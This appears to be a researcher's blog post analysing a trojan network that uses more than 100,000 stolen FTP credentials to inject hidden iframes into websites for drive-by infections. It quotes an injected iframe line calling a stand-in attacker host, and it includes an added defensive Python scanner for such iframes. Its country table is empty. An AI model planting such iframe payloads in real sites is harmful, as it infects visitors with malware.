A month ago I found a pretty interesting trojan in my honeypots. An initial analysis showed that it contacted a server in Russia, and a closer look revealed around 150, sometimes even 200, simultaneous sessions between this server and many different, probably infected, clients. Obviously I was facing quite a large-scale command and control server (C&C) designed to serve thousands of infected systems in order to keep a bunch of different kinds of malware running. An in-depth examination of the data flowing between my honeypots and this C&C suggested that the infected client received usernames and passwords for compromised FTP accounts around the world from the C&C. The origin of those credentials can only be speculated about, but keyloggers or trade in specialized criminal markets for this kind of information would be plausible explanations.

Subsequently the infected clients used the supplied credentials to log into the affected FTP accounts and recursively scanned for typical filenames appearing on websites (like index.html). Of course not all of those accounts are actually related to websites, but a considerable part of them is. Suitable files, if found, are modified in a subtle way such that unsuspecting visitors of those websites using browsers with unpatched vulnerabilities are infected by malware without any additional action on their part. This kind of infection is called a drive-by infection, because users can be infected by simply accessing a website (hence "drive-by"). While the old-fashioned method of sending spam mails with malicious attachments becomes more and more ineffective, drive-by infections are increasingly becoming the method of choice.
Until now it was possible to collect more than 100,000 unique FTP credentials from the Russian C&C server.
Here is a short illustration of how the criminal process works:
- Zombie to C&C: Heya! Feed me Seymour, I want FTP credentials!
- C&C to zombie: Here you have some FTP credentials:
- Our zombie tries to log in using the supplied FTP credentials.
- If the login is successful,
- it tries to inject malicious code (iframes) into one or more .html files that already exist on the victim server ftp.host.tld, e.g.:
<iframe src=evilserver.tld/getexploits.php border=0>
- An unsuspecting user ("poor-guy") visits www.host.tld; he trusts this site because he has used it many times before and never experienced any problems.
- Poor-guy gets back the normal web content as usual, but this time "enriched" with an invisible iframe that points to the malicious domain evilserver.tld.
- Poor-guy's browser now downloads the script getexploits.php from evilserver.tld…
- But this script getexploits.php is malicious and tries to exploit several well-known vulnerabilities in poor-guy's browser or in its installed plugins…
If any of those attacks is successful, poor-guy's browser downloads a trojan from evilserver.tld which turns his computer into another zombie. This zombie can now watch poor-guy's actions, steal his banking credentials, or set up further drive-by infections as in step 1: the zombie is under the control of the attacker.
Cycle 1: Drive-By setup cycle
Cycle 2: Drive-By exploit cycle
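The injection step above is the one a site owner can check for directly. The following scanner is an added example, not code from the original post or from the malware: it walks a document root the way the zombie walks the FTP account, parses every HTML file and flags iframes whose src points to a host other than the site's own (absolute, scheme-relative, or the schemeless bare-host form quoted in the snippet above) and iframes styled to be invisible. Note that the quoted snippet only removes the frame border; real injections usually also set width/height to 0 or display:none, which is what the "hidden" check looks for. The function and constant names, the site host www.host.tld and the three sample pages are assumptions constructed for the example.

```python
"""Added example: find injected external or hidden <iframe> tags under a web root."""
import os
import re
import tempfile
from html.parser import HTMLParser
from urllib.parse import urlsplit

HTML_EXTENSIONS = {".html", ".htm", ".shtml", ".php"}

# Heuristic for the schemeless form in the injected snippet
# (src=evilserver.tld/getexploits.php): a first path segment that looks like a
# host name followed by more path. Relative links such as about.html or
# img/logo.png do not match.
BARE_HOST_RE = re.compile(r"^[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+/")


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag in a document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _dim(value):
    """Parse a width/height attribute ('0', '1px', '100%'); None if absent/unparseable."""
    if value is None:
        return None
    m = re.match(r"^\s*(\d+)", value)
    return int(m.group(1)) if m else None


def classify_iframe(attrs, site_host):
    """Return the reasons an iframe looks injected; an empty list means benign."""
    reasons = []
    src = attrs.get("src", "").strip()
    parts = urlsplit(src)
    if parts.netloc and parts.netloc.lower() != site_host.lower():
        reasons.append("external-host")          # http://evil/... or //evil/...
    elif not parts.netloc and BARE_HOST_RE.match(src):
        reasons.append("bare-host")              # evilserver.tld/getexploits.php
    style = attrs.get("style", "").replace(" ", "").lower()
    hidden_style = "display:none" in style or "visibility:hidden" in style
    dims = [_dim(attrs.get(k)) for k in ("width", "height")]
    tiny = any(d is not None and d <= 1 for d in dims)
    if hidden_style or tiny:
        reasons.append("hidden")
    return reasons


def scan_webroot(root, site_host):
    """Walk root recursively; return sorted (relative path, iframe src, reasons)."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            if os.path.splitext(name)[1].lower() not in HTML_EXTENSIONS:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                collector = IframeCollector()
                collector.feed(fh.read())
            for attrs in collector.iframes:
                reasons = classify_iframe(attrs, site_host)
                if reasons:
                    rel = os.path.relpath(path, root).replace(os.sep, "/")
                    findings.append((rel, attrs.get("src", ""), reasons))
    return sorted(findings)


# Constructed sample document root: one clean page and two injected pages.
SAMPLE_SITE = {
    "index.html": ('<html><body><h1>www.host.tld</h1>'
                   '<iframe src="/widgets/map.html" width="300" height="200"></iframe>'
                   '</body></html>'),
    "sub/index.html": ('<html><body><p>Sub page</p>'
                       '<iframe src="http://evilserver.tld/getexploits.php" '
                       'width=0 height=0 frameborder=0></iframe></body></html>'),
    "blog/index.htm": ('<html><body><p>Blog</p>'
                       '<iframe src=evilserver.tld/getexploits.php border=0></iframe>'
                       '</body></html>'),
    "img/readme.txt": "not html, ignored",
}


def build_sample_site():
    """Write SAMPLE_SITE into a fresh temporary directory and return its path."""
    root = tempfile.mkdtemp(prefix="webroot-")
    for rel, content in SAMPLE_SITE.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


def demo():
    """Build the sample site, scan it as www.host.tld and return the findings."""
    return scan_webroot(build_sample_site(), "www.host.tld")


if __name__ == "__main__":
    for rel, src, reasons in demo():
        print(f"{rel}: iframe src={src!r} -> {', '.join(reasons)}")
```

On the sample site the scanner reports blog/index.htm (bare-host) and sub/index.html (external-host, hidden) and stays quiet on the legitimate same-site iframe in index.html. Against a real document root, point it at the FTP-accessible tree and pass the site's own host name; anything it flags that you did not put there is a strong sign the FTP credentials were used as described above.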
Let's have a closer look at these FTP credentials. Currently there are "only" around 150 credentials related to Swiss Internet service providers (ISPs), among them a Swiss university, a website of a cantonal (state) administration, and a couple of international organisations with offices registered in Switzerland.
The Swiss Reporting and Analysis Centre for Information Assurance (MELANI) has meanwhile contacted most of the more important account owners; contacting all of them will take more time due to their very limited resources. An extended look at the affected accounts worldwide is much scarier though, as credentials from space centres, banks, universities, TV channels and political parties show up.
The table below gives you a short summary of the fifteen countries with the largest number of captured credentials:
Rank | Country | # of credentials | in %
As you can see, nearly 30% of the retrieved credentials concern US ISPs.
Note: UNKNOWN are mostly credentials for private addresses in local area networks (LANs), such as 192.168.x.x, which cannot be assigned to a country.
Currently I'm working together with the Swiss Reporting and Analysis Centre for Information Assurance (MELANI) and the US CERT Coordination Center (CERT/CC) to inform the relevant authorities in affected countries, preferably national CERTs, as far as this is possible given the dimension of the problem. Most European countries are already informed.
Last but not least I would like to express special thanks to MELANI / GovCERT.ch and the US CERT/CC, who have been supporting me since I started working on this case. Thank you very much! You guys do a great job!
If you have any questions, please use the contact form.